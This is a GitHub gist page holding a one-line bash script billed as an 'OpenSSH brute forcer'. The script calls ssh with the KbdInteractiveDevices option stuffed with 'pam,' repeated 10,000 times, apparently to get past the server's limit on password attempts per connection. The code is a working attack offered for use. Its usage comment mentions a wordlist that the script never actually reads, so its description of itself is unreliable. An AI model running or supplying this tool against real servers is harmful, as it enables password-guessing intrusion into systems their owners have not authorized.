Skip to content

Instantly share code, notes, and snippets.

@miglen
Last active August 29, 2015 14:25
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save miglen/e7f75576c1db846caceb to your computer and use it in GitHub Desktop.
Save miglen/e7f75576c1db846caceb to your computer and use it in GitHub Desktop.
OpenSSH brute forcer
#!/bin/bash
# usage ./sshcracker.sh ssh-username ssh-host wordlist.file
#
ssh -l$1 -oKbdInteractiveDevices=`perl -e 'print "pam," x 10000'` $2
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment